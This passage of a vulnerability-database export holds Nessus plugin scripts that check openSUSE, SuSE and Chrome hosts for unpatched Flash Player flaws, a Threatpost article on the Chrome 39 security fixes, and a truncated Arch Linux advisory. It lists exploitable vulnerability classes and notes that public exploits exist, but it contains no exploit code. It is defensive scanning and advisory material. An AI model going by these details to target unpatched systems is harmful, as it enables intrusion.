\n\n - A permission issue that could be exploited to perform\n privilege escalation from low to medium integrity level\n (CVE-2014-8442).", "edition": 18, "published": "2014-11-19T00:00:00", "title": "openSUSE Security Update : flash-player (openSUSE-SU-2014:1444-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0581", "CVE-2014-0574", "CVE-2014-0576", "CVE-2014-0590", "CVE-2014-8442", "CVE-2014-0583", "CVE-2014-0577", "CVE-2014-0589", "CVE-2014-0584", "CVE-2014-0586", "CVE-2014-0573", "CVE-2014-0585", "CVE-2014-8437", "CVE-2014-0582", "CVE-2014-0588", "CVE-2014-8440", "CVE-2014-8438", "CVE-2014-8441"], "modified": "2014-11-19T00:00:00", "cpe": ["cpe:/o:novell:opensuse:12.3", "p-cpe:/a:novell:opensuse:flash-player-kde4", "p-cpe:/a:novell:opensuse:flash-player-gnome", "cpe:/o:novell:opensuse:13.2", "p-cpe:/a:novell:opensuse:flash-player", "cpe:/o:novell:opensuse:13.1"], "id": "OPENSUSE-2014-683.NASL", "href": "https://www.tenable.com/plugins/nessus/79324", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2014-683.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(79324);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2014-0573\", \"CVE-2014-0574\", \"CVE-2014-0576\", \"CVE-2014-0577\", \"CVE-2014-0581\", \"CVE-2014-0582\", \"CVE-2014-0583\", \"CVE-2014-0584\", \"CVE-2014-0585\", \"CVE-2014-0586\", \"CVE-2014-0588\", \"CVE-2014-0589\", \"CVE-2014-0590\", \"CVE-2014-8437\", \"CVE-2014-8438\", \"CVE-2014-8440\", \"CVE-2014-8441\", \"CVE-2014-8442\");\n\n script_name(english:\"openSUSE Security Update : flash-player (openSUSE-SU-2014:1444-1)\");\n script_summary(english:\"Check for the openSUSE-2014-683 
patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"flash-player was updated to version 11.2.202.418 to fix 18 security\nissues.\n\nThese security issues were fixed :\n\n - Memory corruption vulnerabilities that could lead to\n code execution (CVE-2014-0576, CVE-2014-0581,\n CVE-2014-8440, CVE-2014-8441).\n\n - Use-after-free vulnerabilities that could lead to code\n execution (CVE-2014-0573, CVE-2014-0588, CVE-2014-8438).\n\n - A double free vulnerability that could lead to code\n execution (CVE-2014-0574).\n\n - Type confusion vulnerabilities that could lead to code\n execution (CVE-2014-0577, CVE-2014-0584, CVE-2014-0585,\n CVE-2014-0586, CVE-2014-0590).\n\n - Heap buffer overflow vulnerabilities that could lead to\n code execution (CVE-2014-0582, CVE-2014-0589).\n\n - An information disclosure vulnerability that could be\n exploited to disclose session tokens (CVE-2014-8437).\n\n - A heap buffer overflow vulnerability that could be\n exploited to perform privilege escalation from low to\n medium integrity level (CVE-2014-0583). 
\n\n - A permission issue that could be exploited to perform\n privilege escalation from low to medium integrity level\n (CVE-2014-8442).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=905032\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2014-11/msg00071.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected flash-player packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player UncompressViaZlibVariant Uninitialized Memory');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:flash-player\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:flash-player-gnome\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:flash-player-kde4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:12.3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/11/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/11/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE12\\.3|SUSE13\\.1|SUSE13\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"12.3 / 13.1 / 13.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE12.3\", reference:\"flash-player-11.2.202.418-2.100.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"flash-player-gnome-11.2.202.418-2.100.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"flash-player-kde4-11.2.202.418-2.100.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"flash-player-11.2.202.418-74.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"flash-player-gnome-11.2.202.418-74.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"flash-player-kde4-11.2.202.418-74.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"flash-player-11.2.202.418-2.11.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"flash-player-gnome-11.2.202.418-2.11.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"flash-player-kde4-11.2.202.418-2.11.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n 
exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"flash-player / flash-player-gnome / flash-player-kde4\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-20T14:38:32", "description": "flash-player was updated to version 11.2.202.418 to fix 18 security\nissues :\n\n - Memory corruption vulnerabilities that could lead to\n code execution. (CVE-2014-0576 / CVE-2014-0581 /\n CVE-2014-8440 / CVE-2014-8441)\n\n - Use-after-free vulnerabilities that could lead to code\n execution. (CVE-2014-0573 / CVE-2014-0588 /\n CVE-2014-8438)\n\n - A double free vulnerability that could lead to code\n execution. (CVE-2014-0574)\n\n - Type confusion vulnerabilities that could lead to code\n execution. (CVE-2014-0577 / CVE-2014-0584 /\n CVE-2014-0585 / CVE-2014-0586 / CVE-2014-0590)\n\n - Heap buffer overflow vulnerabilities that could lead to\n code execution. (CVE-2014-0582 / CVE-2014-0589)\n\n - An information disclosure vulnerability that could be\n exploited to disclose session tokens. (CVE-2014-8437)\n\n - A heap buffer overflow vulnerability that could be\n exploited to perform privilege escalation from low to\n medium integrity level. (CVE-2014-0583)\n\n - A permission issue that could be exploited to perform\n privilege escalation from low to medium integrity level\n (CVE-2014-8442). 
Further information can be found at\n http://helpx.adobe.com/security/products/flash-player/apsb14-24.html .", "edition": 17, "published": "2014-11-18T00:00:00", "title": "SuSE 11.3 Security Update : flash-player (SAT Patch Number 9958)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0581", "CVE-2014-0574", "CVE-2014-0576", "CVE-2014-0590", "CVE-2014-8442", "CVE-2014-0583", "CVE-2014-0577", "CVE-2014-0589", "CVE-2014-0584", "CVE-2014-0586", "CVE-2014-0573", "CVE-2014-0585", "CVE-2014-8437", "CVE-2014-0582", "CVE-2014-0588", "CVE-2014-8440", "CVE-2014-8438", "CVE-2014-8441"], "modified": "2014-11-18T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:11:flash-player-gnome", "p-cpe:/a:novell:suse_linux:11:flash-player-kde4", "cpe:/o:novell:suse_linux:11", "p-cpe:/a:novell:suse_linux:11:flash-player"], "id": "SUSE_11_FLASH-PLAYER-141114.NASL", "href": "https://www.tenable.com/plugins/nessus/79308", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. 
The text itself is\n# copyright (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(79308);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2014-0573\", \"CVE-2014-0574\", \"CVE-2014-0576\", \"CVE-2014-0577\", \"CVE-2014-0581\", \"CVE-2014-0582\", \"CVE-2014-0583\", \"CVE-2014-0584\", \"CVE-2014-0585\", \"CVE-2014-0586\", \"CVE-2014-0588\", \"CVE-2014-0589\", \"CVE-2014-0590\", \"CVE-2014-8437\", \"CVE-2014-8438\", \"CVE-2014-8440\", \"CVE-2014-8441\", \"CVE-2014-8442\");\n\n script_name(english:\"SuSE 11.3 Security Update : flash-player (SAT Patch Number 9958)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 11 host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"flash-player was updated to version 11.2.202.418 to fix 18 security\nissues :\n\n - Memory corruption vulnerabilities that could lead to\n code execution. (CVE-2014-0576 / CVE-2014-0581 /\n CVE-2014-8440 / CVE-2014-8441)\n\n - Use-after-free vulnerabilities that could lead to code\n execution. (CVE-2014-0573 / CVE-2014-0588 /\n CVE-2014-8438)\n\n - A double free vulnerability that could lead to code\n execution. (CVE-2014-0574)\n\n - Type confusion vulnerabilities that could lead to code\n execution. (CVE-2014-0577 / CVE-2014-0584 /\n CVE-2014-0585 / CVE-2014-0586 / CVE-2014-0590)\n\n - Heap buffer overflow vulnerabilities that could lead to\n code execution. (CVE-2014-0582 / CVE-2014-0589)\n\n - An information disclosure vulnerability that could be\n exploited to disclose session tokens. (CVE-2014-8437)\n\n - A heap buffer overflow vulnerability that could be\n exploited to perform privilege escalation from low to\n medium integrity level. 
(CVE-2014-0583)\n\n - A permission issue that could be exploited to perform\n privilege escalation from low to medium integrity level\n (CVE-2014-8442). Further information can be found at\n http://helpx.adobe.com/security/products/flash-player/ap\n sb14-24.html .\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=905032\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2014-0573.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2014-0574.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2014-0576.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2014-0577.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2014-0581.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2014-0582.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2014-0583.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2014-0584.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2014-0585.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2014-0586.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2014-0588.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2014-0589.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n 
value:\"http://support.novell.com/security/cve/CVE-2014-0590.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2014-8437.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2014-8438.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2014-8440.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2014-8441.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2014-8442.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply SAT patch number 9958.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player UncompressViaZlibVariant Uninitialized Memory');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:flash-player\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:flash-player-gnome\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:flash-player-kde4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/11/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/11/18\");\n script_end_attributes();\n\n 
script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\npl = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(pl) || int(pl) != 3) audit(AUDIT_OS_NOT, \"SuSE 11.3\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"i586\", reference:\"flash-player-11.2.202.418-0.3.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"i586\", reference:\"flash-player-gnome-11.2.202.418-0.3.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"i586\", reference:\"flash-player-kde4-11.2.202.418-0.3.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"flash-player-11.2.202.418-0.3.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"flash-player-gnome-11.2.202.418-0.3.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"flash-player-kde4-11.2.202.418-0.3.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": 
{"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-03-01T03:21:28", "description": "The version of Google Chrome installed on the remote Windows host is a\nversion prior to 38.0.2125.122. It is, therefore, affected by the\nfollowing vulnerabilities due to the version of Adobe Flash bundled\nwith the application :\n\n - Multiple memory corruption vulnerabilities allow an\n attacker to execute arbitrary code. (CVE-2014-0576,\n CVE-2014-0581, CVE-2014-8440, CVE-2014-8441)\n\n - Multiple use-after-free vulnerabilities could result in\n arbitrary code execution. (CVE-2014-0573, CVE-2014-0588,\n CVE-2014-8438, CVE-2014-0574)\n\n - Multiple type confusion vulnerabilities could result in\n arbitrary code execution. (CVE-2014-0577, CVE-2014-0584,\n CVE-2014-0585, CVE-2014-0586, CVE-2014-0590)\n\n - Multiple heap-based buffer overflow vulnerabilities can\n be exploited to execute arbitrary code or elevate\n privileges. (CVE-2014-0583, CVE-2014-0582,\n CVE-2014-0589)\n\n - A permission issue that allows a remote attacker to gain\n elevated privileges. (CVE-2014-8442)\n\n - An information disclosure vulnerability can be exploited\n to disclose secret session tokens. 
(CVE-2014-8437)", "edition": 27, "published": "2014-11-12T00:00:00", "title": "Google Chrome < 38.0.2125.122 Multiple Vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0581", "CVE-2014-0574", "CVE-2014-0576", "CVE-2014-0590", "CVE-2014-8442", "CVE-2014-0583", "CVE-2014-0577", "CVE-2014-0589", "CVE-2014-0584", "CVE-2014-0586", "CVE-2014-0573", "CVE-2014-0585", "CVE-2014-8437", "CVE-2014-0582", "CVE-2014-0588", "CVE-2014-8440", "CVE-2014-8438", "CVE-2014-8441"], "modified": "2021-03-02T00:00:00", "cpe": ["cpe:/a:google:chrome"], "id": "GOOGLE_CHROME_38_0_2125_122.NASL", "href": "https://www.tenable.com/plugins/nessus/79141", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(79141);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2019/11/25\");\n\n script_cve_id(\n \"CVE-2014-0573\",\n \"CVE-2014-0574\",\n \"CVE-2014-0576\",\n \"CVE-2014-0577\",\n \"CVE-2014-0581\",\n \"CVE-2014-0582\",\n \"CVE-2014-0583\",\n \"CVE-2014-0584\",\n \"CVE-2014-0585\",\n \"CVE-2014-0586\",\n \"CVE-2014-0588\",\n \"CVE-2014-0589\",\n \"CVE-2014-0590\",\n \"CVE-2014-8437\",\n \"CVE-2014-8438\",\n \"CVE-2014-8440\",\n \"CVE-2014-8441\",\n \"CVE-2014-8442\"\n );\n script_bugtraq_id(\n 71033,\n 71035,\n 71036,\n 71037,\n 71038,\n 71039,\n 71040,\n 71041,\n 71042,\n 71043,\n 71044,\n 71045,\n 71046,\n 71047,\n 71048,\n 71049,\n 71050,\n 71051\n );\n\n script_name(english:\"Google Chrome < 38.0.2125.122 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the version number of Google Chrome.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host contains a web browser that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Google Chrome installed on the remote Windows host is a\nversion prior to 38.0.2125.122. 
It is, therefore, affected by the\nfollowing vulnerabilities due to the version of Adobe Flash bundled\nwith the application :\n\n - Multiple memory corruption vulnerabilities allow an\n attacker to execute arbitrary code. (CVE-2014-0576,\n CVE-2014-0581, CVE-2014-8440, CVE-2014-8441)\n\n - Multiple use-after-free vulnerabilities could result in\n arbitrary code execution. (CVE-2014-0573, CVE-2014-0588,\n CVE-2014-8438, CVE-2014-0574)\n\n - Multiple type confusion vulnerabilities could result in\n arbitrary code execution. (CVE-2014-0577, CVE-2014-0584,\n CVE-2014-0585, CVE-2014-0586, CVE-2014-0590)\n\n - Multiple heap-based buffer overflow vulnerabilities can\n be exploited to execute arbitrary code or elevate\n privileges. (CVE-2014-0583, CVE-2014-0582,\n CVE-2014-0589)\n\n - A permission issue that allows a remote attacker to gain\n elevated privileges. (CVE-2014-8442)\n\n - An information disclosure vulnerability can be exploited\n to disclose secret session tokens. (CVE-2014-8437)\");\n # http://googlechromereleases.blogspot.com/2014/11/stable-channel-update.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?fb7317d6\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Google Chrome 38.0.2125.122 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-8441\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player UncompressViaZlibVariant Uninitialized Memory');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n 
script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/11/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/11/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/11/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:google:chrome\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"google_chrome_installed.nasl\");\n script_require_keys(\"SMB/Google_Chrome/Installed\");\n\n exit(0);\n}\n\ninclude(\"google_chrome_version.inc\");\n\nget_kb_item_or_exit(\"SMB/Google_Chrome/Installed\");\ninstalls = get_kb_list(\"SMB/Google_Chrome/*\");\n\ngoogle_chrome_check_version(installs:installs, fix:'38.0.2125.122', severity:SECURITY_HOLE, xss:FALSE);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2018-10-06T22:57:50", "bulletinFamily": "info", "cvelist": ["CVE-2014-0574", "CVE-2014-7899", "CVE-2014-7900", "CVE-2014-7901", "CVE-2014-7902", "CVE-2014-7903", "CVE-2014-7904", "CVE-2014-7905", "CVE-2014-7906", "CVE-2014-7907", "CVE-2014-7908", "CVE-2014-7909"], "description": "Google has released Chrome 39, fixing 42 security vulnerabilities and removing support for the fallback to SSLv3, the component that was the target of the [POODLE attack](<https://threatpost.com/new-poodle-ssl-3-0-attack-exploits-protocol-fallback-issue/108844>) revealed last month.\n\nWhen the POODLE attack was disclosed by several Google researchers in October, the company said that it had added a change to Chrome that would disable SSLv3 fallback. 
The technique involves an attacker forcing a server to fall back from a modern version of SSL/TLS to the older SSLv3 and then decrypting the protected traffic by sending a high volume of requests to the server. The company plans to disable support for SSLv3 altogether at some point in the near future.\n\n\u201cA little further down the line, perhaps in about three months, we hope to disable SSLv3 completely. The changes that I\u2019ve just landed in Chrome only disable fallback to SSLv3 \u2013 a server that correctly negotiates SSLv3 can still use it. Disabling SSLv3 completely will break even more than just disabling the fallback but SSLv3 is now completely broken with CBC-mode ciphers and the only other option is RC4, which is hardly that attractive. Any servers depending on SSLv3 are thus on notice that they need to address that now,\u201d Adam Langley of Google [wrote](<https://www.imperialviolet.org/2014/10/14/poodle.html>) in October.\n\nAmong the fixes in [Chrome 39](<http://googlechromereleases.blogspot.com/2014/11/stable-channel-update_18.html>) are a number of patches for high-risk vulnerabilities, including several buffer overflows, use-after-frees and integer overflows. Google paid out $25,000 in rewards to researchers who reported vulnerabilities fixed in the new release. In addition, the company paid out $16,500 in additional rewards to researchers who found bugs during the development cycle.\n\nThe full list of patches in Chrome 39:\n\n[$500][[389734](<https://code.google.com/p/chromium/issues/detail?id=389734>)] High CVE-2014-7899: Address bar spoofing. _Credit to _[_Eli Grey_](<http://eligrey.com/>)_._\n\n[$1500][[406868](<https://code.google.com/p/chromium/issues/detail?id=406868>)] High CVE-2014-7900: Use-after-free in pdfium. _Credit to Atte Kettunen from OUSPG._\n\n[$1000][[413375](<https://code.google.com/p/chromium/issues/detail?id=413375>)] High CVE-2014-7901: Integer overflow in pdfium. 
_Credit to cloudfuzzer._\n\n[$1000][[414504](<https://code.google.com/p/chromium/issues/detail?id=414504>)] High CVE-2014-7902: Use-after-free in pdfium. _Credit to cloudfuzzer._\n\n[$3000][[414525](<https://code.google.com/p/chromium/issues/detail?id=414525>)] High CVE-2014-7903: Buffer overflow in pdfium. _Credit to cloudfuzzer._\n\n[$2000][[418161](<https://code.google.com/p/chromium/issues/detail?id=418161>)] High CVE-2014-7904: Buffer overflow in Skia. _Credit to Atte Kettunen from OUSPG._\n\n[$2000][[421817](<https://code.google.com/p/chromium/issues/detail?id=421817>)] High CVE-2014-7905: Flaw allowing navigation to intents that do not have the BROWSABLE category. _Credit to WangTao(neobyte) of Baidu X-Team._\n\n[$500][[423030](<https://code.google.com/p/chromium/issues/detail?id=423030>)] High CVE-2014-7906: Use-after-free in pepper plugins. _Credit to Chen Zhang (demi6od) of the NSFOCUS Security Team._\n\n[$7500][[423703](<https://code.google.com/p/chromium/issues/detail?id=423703>)] High CVE-2014-0574: Double-free in Flash. _Credit to_ _biloulehibou._\n\n[$5000][[424453](<https://code.google.com/p/chromium/issues/detail?id=424453>)] High CVE-2014-7907: Use-after-free in blink. _Credit to Chen Zhang (demi6od) of the NSFOCUS Security Team._\n\n[$500][[425980](<https://code.google.com/p/chromium/issues/detail?id=425980>)] High CVE-2014-7908: Integer overflow in media. _Credit to Christoph Diehl._\n\n[$500][[391001](<https://code.google.com/p/chromium/issues/detail?id=391001>)] Medium CVE-2014-7909: Uninitialized memory read in Skia. 
_Credit to miaubiz._\n", "modified": "2014-11-24T18:40:37", "published": "2014-11-18T13:42:18", "id": "THREATPOST:DCCF6E08CBB78DDE988D0C3CB0E04C1A", "href": "https://threatpost.com/google-removes-sslv3-fallback-support-from-chrome/109455/", "type": "threatpost", "title": "Google Removes SSLv3 Fallback Support From Chrome", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "archlinux": [{"lastseen": "2016-09-02T18:44:48", "bulletinFamily": "unix", "cvelist": ["CVE-2014-7899", "CVE-2014-7908", "CVE-2014-7906", "CVE-2014-7909", "CVE-2014-7907", "CVE-2014-7904", "CVE-2014-7901", "CVE-2014-7903", "CVE-2014-7910", "CVE-2014-7902", "CVE-2014-7900"], "description": "- CVE-2014-7899 (address bar spoofing)\nA flaw allows remote attackers to spoof the address bar by placing a\nblob: substring at the beginning of the URL, followed by the original\nURI scheme and a long username string.\n\n- CVE-2014-7900 (use-after-free)\nUse-after-free vulnerability in the CPDF_Parser::IsLinearizedFile\nfunction in fpdfapi/fpdf_parser/fpdf_parser_parser.cpp in PDFium allows\nremote attackers to cause a denial of service or possibly have\nunspecified other impact via a crafted PDF document.\n\n- CVE-2014-7901 (integer overflow)\nInteger overflow in the opj_t2_read_packet_data function in\nfxcodec/fx_libopenjpeg/libopenjpeg20/t2.c in OpenJPEG in PDFium allows\nremote attackers to cause a denial of service or possibly have\nunspecified other impact via a long segment in a JPEG image.\n\n- CVE-2014-7902 (use-after-free)\nUse-after-free vulnerability in PDFium allows remote attackers to cause\na denial of service or possibly have unspecified other impact via a\ncrafted PDF document.\n\n- CVE-2014-7903 (buffer 